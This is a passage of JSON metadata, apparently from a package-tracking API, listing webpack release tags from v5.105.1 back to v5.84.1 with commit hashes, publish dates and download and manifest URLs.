webpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c